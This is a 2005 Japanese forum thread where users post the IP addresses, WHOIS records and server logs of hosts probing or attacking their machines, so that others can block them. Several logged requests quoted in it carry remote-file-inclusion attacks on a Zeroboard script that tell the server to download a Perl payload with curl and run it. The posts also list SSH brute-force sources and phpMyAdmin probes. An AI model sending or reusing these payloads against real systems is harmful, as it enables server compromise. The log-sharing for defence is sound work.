不正アクセスしてくるIPを晒すスレ Part8

勝手に不正アクセスしてくるＩＰを晒していくスレ 
FWのIPフィルター設定し、アクセス拒否する参考にドゾー 

注：Whois 全部貼らなくていいから 
IPと国ぐらいで簡単に報告！ 

IPアドレスの検索は、 

IPドメインSEARCH　 
http://www.mse.co.jp/ip_domain/ 

IPアドレス検索／サイバーエリアリサーチ株式会社 
http://www.arearesearch.co.jp/ip-kensaku.html 

サイトチェック 
http://sitecheck.jp/checkip.phtml 

McAfee NeoTrace Express 3.25 
http://www.networkingfiles.com/PingFinger/Neotraceexpress.htm 

前スレ 
不正アクセスしてくるIPを晒すスレ Part7 
http://pc8.2ch.net/test/read.cgi/sec/1117558232/

URLの最後に余計な入ってしまった
ｽﾏｿ

↑余計なスペースだよ…
逝ってくるorz

216 名前：名無しさん＠お腹いっぱい。 投稿日：05/01/22 18:37:37
　　　>>216
　　　スレ勉しる。
　　　おまいの晒したIP無意味だぽ。
　　　反論したければ、特定結果かもしくは通報の返答をうｐしる。



　　　っても、池沼にゃ無理な相談か。。。


>>216 m9（^Д^）

210.150.160.253
renoir.excite.co.jp

　　　　 　　／⌒ヽ
⊂二二二（　＾ω＾）二⊃
　　　　　|　　　 / 　　　　　　ﾌﾞｰﾝ
　 　　　 （　ヽノ
　　　　　 ﾉ>ノ　
　 三　　レﾚ

>>1
これ読んで
http://www.ipa.go.jp/security/fy12/contents/crack/soho/soho/chap1/ipspoof.html

死んで来いタコ

（　・∀・）＜今日の朝、前スレにいたうんこマンだけど
　　　　　　　誰かMEにTEACHしてくれYO！
http://pc8.2ch.net/test/read.cgi/sec/1117558232/982-985
（　・∀・）＜ｴﾛいみんな教えてくれYO！

IP　 202.180.199.208
ホスト pc40208.ict.ne.jp
伊賀上野・・・忍の技には長けていないようですな

>>7
>>4

>>5
>>4

>>7
無意味とは限らん。
偽装する方法があるからといって、現実にすべて偽装されてはいない。
わざわざ偽装などしてないことの方が多いのではないか。

次スレ乙。そして3日間不正アクセスなくて珍しいと思ったらこれか。(省略部分は同じか似たようなアクセス)
2005/11/05(03:54:16) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) [80] 404 0 "POST /xmlrpc.php HTTP/1.1" ( dummy )
2005/11/05(03:54:21) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:26) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:31) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:37) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:42) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:47) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:52) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:54:58) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:03) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:08) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:14) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:19) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:24) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165)
2005/11/05(03:55:29) W-SV a80-127-141-165.adsl.xs4all.nl(80.127.141.165) [80] 404 0 "POST /phpgroupware/xmlrpc.php HTTP/1.1" ( dummy )
2005/11/05(10:23:24) W-SV 211.95.176.67 [80] 400 0 "GET http//www.ebay.com/ HTTP/1.1" ( dummy )
2005/11/06(20:53:39) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp(211.2.39.63) [80] 302 29 "GET / HTTP/1.0" ( dummy )
2005/11/06(20:55:03) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp
2005/11/06(22:11:08) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp
2005/11/06(23:00:13) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp
2005/11/06(23:52:22) W-SV ntkyto063063.kyto.nt.adsl.ppp.infoweb.ne.jp(211.2.39.63) [80] 302 29 "GET / HTTP/1.0" ( dummy )

それと脆弱性だろうというのは把握している。

コイツうぜ〜

IPアドレス 59.190.125.222
ホスト名 59-190-125-222.eonet.ne.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 兵庫県
市外局番 --
接続回線 光

なんか今日多い。腹立つ。

IPアドレス 58.1.137.236
ホスト名 nttkyo331236.tkyo.nt.ftth.ppp.infoweb.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 東京都
市外局番 --
接続回線 光


IPアドレス 58.1.108.15
ホスト名 ntsitm184015.sitm.nt.ftth.ppp.infoweb.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 埼玉県
市外局番 --
接続回線 光

>>1
乙ですが、ポートも書くように付け加えとくべきでしたね。
あいかわらず何されたか書けない人多い。

IP 220.159.53.253
ホスト t553253.ipgw.phs.yoyogi.mopera.ne.jp
ドコモ経由ってのは初体験だな。

>>4
>>7

2005/11/07(23:56:59) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404 0 "GET /pma/main.php HTTP/1.1" ( dummy )
2005/11/07(23:56:59) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404
2005/11/07(23:57:00) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404
2005/11/07(23:57:01) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404
2005/11/07(23:57:01) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404
2005/11/07(23:57:02) W-SV dsl160.235.und.nodak.edu(134.129.160.235) [80] 404 0 "GET /phpmyadmin/main.php HTTP/1.1" ( dummy )
2005/11/08(02:12:59) W-SV 218.234.130.16 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//upteams.netfirms.com/fbi.gif?&cmd=cd%20/tmp;%20curl%20-O%20viperxl.wc.hu/piz;perl%20piz HTTP/1.1" ( dummy )
2005/11/08(02:13:05) W-SV 218.234.130.16 [80] 404
2005/11/08(02:13:11) W-SV 218.234.130.16 [80] 404
2005/11/08(02:13:17) W-SV 218.234.130.16 [80] 404
2005/11/08(02:13:23) W-SV 218.234.130.16 [80] 404
2005/11/08(02:13:29) W-SV 218.234.130.16 [80] 404 0 "GET /skin/zero_vote/error.php?dir=http//upteams.netfirms.com/fbi.gif?&cmd=cd%20/tmp;%20curl%20-O%20viperxl.wc.hu/piz;perl%20piz HTTP/1.1" ( dummy )

こいつしつこい…

IPアドレス 58.93.87.11
ホスト名 i58-93-87-11.s02.a012.ap.plala.or.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 xDSL

IP Address = 210.235.243.41
Host Name = ea41.opt2.point.ne.jp

a. [IPネットワークアドレス] 210.235.240.0/21
b. [ネットワーク名] TEPCO-HIKARI
f. [組織名] 株式会社ドリーム・トレイン・インターネット
g. [Organization] DREAM TRAIN INTERNET,Inc.
m. [管理者連絡窓口] MH4804JP
n. [技術連絡担当者] MK10931JP
p. [ネームサーバ] ns.dti.ad.jp
p. [ネームサーバ] ns2.dti.ad.jp
[割当年月日] 2004/11/29

2005/11/09(01:34:49) W-SV jupiter.tntonline.com(204.145.237.11) [80] 404 0 "GET /phpmyadmin/index.php HTTP/1.1" ( )

yahoobb218125122014.bbtec.net

218.125.122.14

IPアドレス 212.87.192.14
ホスト名 fw1-bcnjz0-nix.core.es.inter.net
IPアドレス
　割当国　※ スペイン (ES)

スペインとかこわい・・・・

5W1H

IPアドレス 200.67.92.81
ホスト名 dsl-200-67-92-81.prod-empresarial.com.mx
IPアドレス
割当国　※ メキシコ (MX)

((((;ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

222.234.94.22

P2PやってるカスどもがIP晒してどうすんだｗｗｗ
そりゃ海外からアタックはくるわな。

それ以外はport21,22,25,80,135,137,138,139,443,445
を防ぐかTCP/UDPのSYNフラグを全部はじけばいいだけｗｗｗｗｗｗｗｗｗ

おまえらアホすぎ

[14:58:26] <222.187.114.2> (178,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /http/219.133.51.39/getimage

20.253.253.68

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.253.240.0/20
b. [ネットワーク名] ASAHI-NET
f. [組織名] 朝日ネット
g. [Organization] Asahi Net
m. [管理者連絡窓口] AT009JP
n. [技術連絡担当者] AT009JP
p. [ネームサーバ] crusader.asahi-net.or.jp
p. [ネームサーバ] dns1.asahi-net.or.jp
[割当年月日] 2000/04/05
[最終更新] 2004/04/14 10:00:11(JST)

上位情報
----------
株式会社朝日ネット (ASAHI Net,Inc.)
[割り振り] 210.253.240.0/20

下位情報
----------
該当するデータがありません。

朝日から不正アクセス

192.168.1.11 　　　←　最近うざすぎ！！
　
ノートンが反応しっぱなし！

　　　　　　_/i　　　　i'l,_
　　　 　./ЩＹ. 　　　ＹЩ）
　　　　ノﾆ;;ノ　　　　ヽ;;;ﾆi,　　　　 人人人人人人人人人
　　　 /　　i　　　　　　i　　'i 　　＜ こいつ最高にアホ！
　　　 〉　 ''(_　.;;''';;:,　 )''　 〈　　　　Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^Ｙ^
　　　 i, 　 "ヽi"台"i／"　　i　
　　　　> :;;;i　"''''i'''" 　i;;::: <
　　　　 i., ::;l :;;:;;:i:;;;:;;;: l;:　,ﾉ
　　　　 ヽ　"'-::;;:;;::-'"　/
　　　　　 ヽ;;::___:;:___,,.:／　
　　　　　／-､''':::::'''..-''ヽ 　
　　　　/_,,　　ヽ;::;ノ　'" ヽ　
　　　／　x,　ヽﾉヽ/　.x "'､
　　 （.,,　,.　_／　　＼:;　.,,ﾉ, 　
　　　i 彡,,..ノ,　　 　 i".,,_ミﾐi　
　　　 l┐i-７　　　 　ヽ"-iΠ
　　 ／／　）　　　　 　/　＼＼　
　　(＿／"　　　　　　　"'＼＿__)

>>32
うちにもちょっと違うけど同じようなIPから何回も来るよ
まじうざい

>>32
それってアンタのルータのIPじゃないのか？

IP「 210.154.213.246 」
ホスト「 p2246-ipbf201kanazawa.ishikawa.ocn.ne.jp 」
前から突っ込んで来たが、昨日から連続して・・・
此処まで気付かないと言う事は、御老人ユーザーか？

偽装IPもしらんのかこのスレのうんこども

>>37
じゃあ偽装してﾌｼｱﾅしてみろよ。

wbcc2s06.ezweb.ne.jp
KDDI-TS32 UP.Browser/6.2.0.9.1

機種ってWIN32なのでしょうか

馬鹿だなぁと思っていたが、偽装じゃなくてもありえる事が発覚したので、
無線LAN周りの設定を再確認した今日この頃。

inetnum: 203.174.64.0 - 203.174.79.255
netname: DATAHOTEL
descr: Livedoor co., Ltd.
descr: DataHotel TaskForce
country: JP
admin-c: KS62-AP
admin-c: KK110-AP
tech-c: KK110-AP
tech-c: KS62-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-JP-LIVEDOOR
changed: [email protected] 20010531
changed: [email protected] 20040107
status: ALLOCATED PORTABLE
changed: [email protected] 20040302
source: APNIC

person: Kei Kato
nic-hdl: KK110-AP
e-mail: [email protected]
address: 2-16-9, Kabuki-cho, Shinjuku-ku, Tokyo Japan 160-0021
phone: +81-3-5749-9621
fax-no: +81-3-5749-9910
country: JP
changed: [email protected] 20040513
mnt-by: MAINT-JP-LIVEDOOR
source: APNIC

person: Kensaku Shimada
nic-hdl: KS62-AP
e-mail: [email protected]
address: 2-16-9, Kabuki-cho, Shinjuku-ku, Tokyo Japan 160-0021
phone: +81-3-5749-9621
fax-no: +81-3-5749-9910
country: JP
changed: [email protected] 20040513
mnt-by: MAINT-JP-LIVEDOOR
source: APNIC

ルータのアクセスブロック履歴にある
From送信元　と　To宛先

どっちが攻撃側かわかりません
やっぱFromの方？

自分のグローバルIPアドレス確認すればいい話

61.177.64.110

inetnum: 61.177.0.0 - 61.177.255.255
netname: CHINANET-JS
descr: CHINANET jiangsu province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
country: CN
admin-c: CH93-AP
tech-c: CJ186-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-JS
mnt-routes: maint-chinanet-js
changed: [email protected] 20020209
changed: [email protected] 20030306
status: ALLOCATED non-PORTABLE
source: APNIC

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 221.171.0.0/16
b. [ネットワーク名] BIGLOBE-8
f. [組織名] BIGLOBEサービス(日本電気株式会社)
g. [Organization] NEC Corporation
m. [管理者連絡窓口] NK032JP
n. [技術連絡担当者] MK11728JP
p. [ネームサーバ] ns02.mesh.ad.jp
p. [ネームサーバ] ns03.mesh.ad.jp
[割当年月日] 2004/02/04
[最終更新] 2004/04/12 17:47:01(JST)

上位情報
----------
日本電気株式会社 (NEC Corporation)
[割り振り] 221.171.0.0/16

下位情報
----------
該当するデータがありません。

個体識別番号って同じ番号の人ゎいるのでしょうか？

224.0.0.22

222.110.243.187 Korea

62.121.132.250 Poland
rtr.biotech.krakow.pl

83.18.75.138 Poland
awx138.internetdsl.tpnet.pl

ll218a.sport.jyu.fi

[15:37:13] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - -
[15:37:19] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - -
[15:37:20] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - -
[15:37:40] <84.177.218.155> (0,0) [ヘッダー受信中に切断しました] - -

オランダから・・・

202.159.249.219 India

port 445 を叩きに来るのってワームだっけ？

>>53
そそ

俺なら手動でも445なら叩くけど

IPアドレス 220.108.54.114
ホスト名 i220-108-54-114.s02.a012.ap.plala.or.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 xDSL

>>55
445なんか開いてる奴いる？

>>57
PC買って初期の状態のままなら445はあいてるだろ
OSでデフォでふさがれるようになったのはXP・SP2からだし

2005/11/16(10:40:37) W-SV 220.89.250.64 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy )
2005/11/16(10:40:43) W-SV 220.89.250.64 [80] 404 0 "GET /board/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy )
2005/11/16(10:40:49) W-SV 220.89.250.64 [80] 404 0 "GET /zboard/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy )
2005/11/16(10:40:55) W-SV 220.89.250.64 [80] 404 0 "GET /zeroboard/bbs/skin/zero_vote/error.php?dir=http//222.122.47.216/bbs/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http//222.122.47.216/bbs/sess;perl%20sess HTTP/1.1" ( dummy )

11/14は不正アクセスなしだったのに残念。
その他はいつもの/ GETだけだった。

28.40.138.210.wd.2iij.net [210.138.40.28]
何回アクセスしてんだよ

[15:20:17] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:19] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:20] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:21] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:26] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:28] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:29] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:30] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:31] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:32] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:33] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -
[15:20:35] <219.239.227.58> (0,0) [ヘッダー受信中に切断しました] - -

ちぅごくしつこい

IPアドレス 221.117.212.123
ホスト名 221x117x212x123.ap221.ftth.ucom.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 北海道

220.221.94.129
ホスト名 i220-221-94-129.s02.a012.ap.plala.or.jp
IPアドレス
割当国　※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 xDSL

2005/11/17(06:14:55) W-SV 210.178.51.1 [80] 404 0 "GET /bbs/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy )
2005/11/17(06:15:00) W-SV 210.178.51.1 [80] 404 0 "GET /zboard/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy )
2005/11/17(06:15:06) W-SV 210.178.51.1 [80] 404 0 "GET /board/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy )
2005/11/17(06:15:12) W-SV 210.178.51.1 [80] 404 0 "GET /zeroboard/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy )
2005/11/17(06:15:18) W-SV 210.178.51.1 [80] 404 0 "GET /zb41/skin/zero_vote/error.php?dir=http//www.starten.nl/catalog/images/t.txt? HTTP/1.1" ( dummy )

58.157.163.29

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 58.157.163.0/24
b. [ネットワーク名] SUBA-468-2BD
f. [組織名] 株式会社ユーズコミュニケーションズ
g. [Organization] UCOM Corporation
m. [管理者連絡窓口] AT047JP
n. [技術連絡担当者] AT047JP
p. [ネームサーバ] ns01.usen.ad.jp
p. [ネームサーバ] ns02.usen.ad.jp
p. [ネームサーバ] ns03.usen.ad.jp
[割当年月日] 2005/06/09
[最終更新] 2005/06/09 18:12:13(JST)

上位情報
----------
株式会社ユーズコミュニケーションズ (U's Communications Corp.)
[割り振り] 58.156.0.0/15

下位情報
----------
該当するデータがありません。

やぁ、このスレを見た君にとっておきのスペシャルなニュースだ
君はコンピューターウイルスをくらったことあるかい？
ウイルスはとっても危険だ、誰だって避けたい
でも2ちゃんにはそんなウイルスがしこんであるアドレスがたくさん貼ってある
その度にタイーホなんて言われるがリアル逮捕なんてほとんど無い
でもこれは立派な犯罪だ(http://www.ss.iij4u.or.jp/~somali/web/security/obstruct.html)

これから紹介するスレは>>1ことID:H+tEOmVN0が確信的にウイルスを貼って
それをふんだ人を見てあざけ笑っているという、とってもファンキーなスレだ
どうだい君もID:H+tEOmVN0同じように軽い気持ちでリアル通報してみないかい？
みんながまじめに通報なんてしたら
普段やる気の無いポリスも｢いっちょやってみっか｣って気分になるってもんさ
おっと、そこの優しい君はID:H+tEOmVN0がかわいそうなんて思ったかい？
そんな心配、無問題
ID:H+tEOmVN0は逮捕の殿堂に入れるとウキウキワクワク
そんなに期待されたら通報するしかないじゃない
ここらでこれからの2ちゃんのために
｢2ちゃんにウイルスを貼って通報されて逮捕｣っていう分かりやすい前例作ろうぜ！

↓>>1のアドレスにはウイルスしこんであります

http://news19.2ch.net/test/read.cgi/news/1132282995/

アクセス拒否リスト
ttp://transport.ddo.jp/access.csv

かなり成長しました

IPアドレス 58.80.55.28
ホスト名 58x80x55x28.ap58.ftth.ucom.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 光

Domain Information: [ドメイン情報]
a. [ドメイン名] UCOM.NE.JP
b. [ねっとわーくさーびすめい] ゆーこむねっと
c. [ネットワークサービス名] ユーコムネット
d. [Network Service Name] UCOM-NET
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] AT047JP
n. [技術連絡担当者] AT047JP
p. [ネームサーバ] ns01.usen.ad.jp
p. [ネームサーバ] ns02.usen.ad.jp
[状態] Connected (2006/06/30)
[登録年月日] 2005/06/24
[接続年月日] 2005/06/24
[最終更新] 2005/06/24 16:32:04 (JST)

[06:10:03] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:04] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:06] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:07] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:08] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:09] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:10] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:11] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:12] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:13] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:14] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:16] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -
[06:10:17] <219.254.35.101> (0,0) [ヘッダー受信中に切断しました] - -


またkrか！！

61-26-238-188.rev.home.ne.jpからポート1433に断続的に不正アクセスが続いてまつ。氏ね。

220.209.89.160

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.209.75.0-220.209.182.255
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2003/05/08
[最終更新] 2003/12/18 17:02:51(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 220.209.0.0/16

下位情報
----------
該当するデータがありません。

俺のサーバも取引不能です。FMVです。

219.53.112.49

210.255.100.228
毎日１時間近くポート８０突付いてくる

220.150.141.130

下記のIpアドレス最悪！　UPX_Packed_Executableという攻撃をしてきやがった。

IPアドレス 207.217.127.78
ホスト名 update00.psp.pas.earthlink.net
　割当国　※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
【攻撃内容】
UPX_Packed_Executable
このシグネチャは、UPX ツールを使って圧縮された PE/COFF 実行ファイルを
検出します。 UPX で圧縮された実行ファイルの存在は、これ自体が攻撃を示
すものではありませんが、例外が考えられます。 UPX ツールはトロイやマル
ウェアを圧縮するのに広く使用されます。正当な商用ソフトウェアを配布する
のに使用されるツールとしては、あまり一般的ではありません。 このファイル
を調査し、マルウェアの構成要素となっているかどうかを確認する必要があり
ます。

先週パスワードアタックをしてきたホスト
133.27.178.4
140.124.181.220
148.243.214.13dapsaisd.com.mx
161.53.201.3osijek.etfos.hr
202.30.198.233
203.198.68.237ipvpn027237.netvigator.com
204.11.16.194lnx118.onestop.net
210.219.251.113
210.52.66.62
211.106.179.139
211.43.101.132
216.20.254.14
221.117.40.5221x117x40x5.ap221.ftth.ucom.ne.jp
221.143.22.22
221.247.59.66221x247x59x66.ap221.ftth.ucom.ne.jp
58.4.140.15458x4x140x154.ap58.ftth.ucom.ne.jp
59.120.145.759-120-145-7.HINET-IP.hinet.net
67.100.66.101h-67-100-66-101.chcgilgm.covad.net
69.64.37.68 air532.startdedicated.com
70.86.67.130130.70-86-67.reverse.theplanet.com
80.108.7.100chello080108007100.36.11.vie.surfer.at
81.208.32.17081-208-32-170.ip.fastwebnet.it
84.244.0.215serv-1-0-215.lycos-vds.com
84.244.1.254serv-1-1-254.lycos-vds.com

失礼、タブだと無くなっちゃうんですね。
この１週間の間にsshのパスワードアタックをしてきたホストです

133.27.178.4　　
140.124.181.220　　
148.243.214.13　　dapsaisd.com.mx
161.53.201.3　　osijek.etfos.hr
202.30.198.233　　
203.198.68.237　　ipvpn027237.netvigator.com
204.11.16.194　　lnx118.onestop.net
210.219.251.113　　
210.52.66.62　　
211.106.179.139　　
211.43.101.132　　
216.20.254.14　　
221.117.40.5　　221x117x40x5.ap221.ftth.ucom.ne.jp
221.143.22.22　　
221.247.59.66　　221x247x59x66.ap221.ftth.ucom.ne.jp
58.4.140.154　　58x4x140x154.ap58.ftth.ucom.ne.jp
59.120.145.7　　59-120-145-7.HINET-IP.hinet.net
67.100.66.101　　h-67-100-66-101.chcgilgm.covad.net
69.64.37.68　　air532.startdedicated.com
70.86.67.130　　130.70-86-67.reverse.theplanet.com
80.108.7.100　　chello080108007100.36.11.vie.surfer.at
81.208.32.170　　81-208-32-170.ip.fastwebnet.it
84.244.0.215　　serv-1-0-215.lycos-vds.com
84.244.1.254　　serv-1-1-254.lycos-vds.com

大人気に嫉妬。

127.0.0.1←このIPやたら「IP Spoofing」って攻撃してくるんだけど本物のクラッカー？
OrgName:Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US
NetRange: 127.0.0.0 - 127.255.255.255
CIDR:127.0.0.0/8
NetName: LOOPBACK
NetHandle:NET-127-0-0-0-1
Parent:
NetType: IANA Special Use
Comment: Please see RFC 3330 for additional information.
RegDate:
Updated: 2002-10-14

OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName: Internet Corporation for Assigned Names and Number
OrgAbusePhone: +1-310-301-5820
OrgAbuseEmail: [email protected]

OrgTechHandle: IANA-IP-ARIN
OrgTechName: Internet Corporation for Assigned Names and Number
OrgTechPhone: +1-310-301-5820
OrgTechEmail: [email protected]

# ARIN WHOIS database, last updated 2005-11-19 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

ふぁぁ〜眠い
whoisまでやってエライ

＞127.0.0.1←このIPやたら「IP Spoofing」って攻撃してくるんだけど本物のクラッカー？


それってhttp://127.0.0.1/と関係あり？

58.89.146.26

>>81
>それってhttp://127.0.0.1/と関係あり？

なんですかそれ？
127.0.0.1って同じIPがやたらアクセスブロックされてて
ルータの誤作動？かなにかとも思ってたんですが

>>83
とりあえず、そこのアドレス開いてみ？
「ページを表示できません。」てなればとりあえず良し。

おそらく↓のことかと思われ

異世界からの訪問者『 127.0.0.1 』＠セキュリティ板
http://pc8.2ch.net/test/read.cgi/sec/1064122787/

>>84
よくわからないけど表示できませんとなったから大丈夫？なのか
>>85
こんなのあったのか、ありがとう

何この流れ。

NetBIOS210.245.164.161NETBIOS_NS送信UDPNETBIOS_NSLocalHost
NetBIOSwww.naver.co.krNETBIOS_DGM受信UDPNETBIOS_DGMLocalHost

上　割当国　※ 香港 (HK)
下　韓国

何をされているのかわかりません。
詳しい人教えて下さい。

吉田武仁

IP アドレス 61.121.64.13
ホスト名ntaomr032013.aomr.nt.ftth.ppp.infoweb.ne.jp

しつこい

IPアドレス 221.117.212.123
ホスト名 221x117x212x123.ap221.ftth.ucom.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 北海道

IPアドレス 　219.129.21.84
inetnum: 219.128.0.0 - 219.137.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
admin-c: CH93-AP
tech-c: IC83-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINANET-GD
status: ALLOCATED NON-PORTABLE
changed: [email protected] 20020424
changed: [email protected] 20041207
source: APNIC

このチョンしつこすぎ

それは、チョン ではなく チュン です

221.113.223.195

なんかこのIPの人にトロイ仕掛けられてたらしくて、
さっきまで、接続されてたみたいです。
あわててポート閉じたんだけど。
なんとか仕返しできませんか？

プロバイダーの管理者にログ見せて
ごるあするしかないね。
踏み台にされてるだけでも、損害賠償しないといけないこともある。
「あれ」付けるか、回線にファイヤーウォールかませるといいよ。

IPアドレス 219.189.192.205
ホスト名 YahooBB219189192205.bbtec.net
IPアドレス
割当国　※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 xDSL

これに属するアドレスからの不正アクセス多く、しかも長期間。
inetnum: 61.233.40.0 - 61.233.40.255
netname: CRHbYqS
country: CN
descr: China Railcom Hebei Yangquan Subbranch
descr: Telecommunication Company
descr: Yangquan City,Shanxi Province
admin-c: LQ112-AP
tech-c: LM273-AP
status: ASSIGNED NON-PORTABLE
changed: [email protected] 20030731
mnt-by: MAINT-CN-CRTC
source: APNIC

特に61.233.40.205はポート22でsshの口が開いていることを発見。

IPアドレス 58.80.55.28
ホスト名 58x80x55x28.ap58.ftth.ucom.ne.jp
IPアドレス
　割当国　※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 光

SCAN-FIN

210.234.206.34

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.234.206.0/24
b. [ネットワーク名] KDDI-NET
f. [組織名] KDDI株式会社
g. [Organization] KDDI Corporation
m. [管理者連絡窓口] JP00000127
n. [技術連絡担当者] JP00000181
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns10.dion.ne.jp
p. [ネームサーバ] dns2.dion.ne.jp
p. [ネームサーバ] ns1.neweb.ne.jp
[割当年月日] 2003/01/27
[最終更新] 2005/07/27 13:53:51(JST)

上位情報
----------
KDDI株式会社 (KDDI CORPORATION)
[割り振り] 210.234.0.0/16

YahooBB221019024226.bbtec.net

IPアドレス 220.0.40.62
ホスト名 YahooBB220000040062.bbtec.net
IPアドレス
　割当国　※ 日本 (JP)
都道府県 静岡県
市外局番 --
接続回線 xDSL



IPアドレス 61.193.77.67
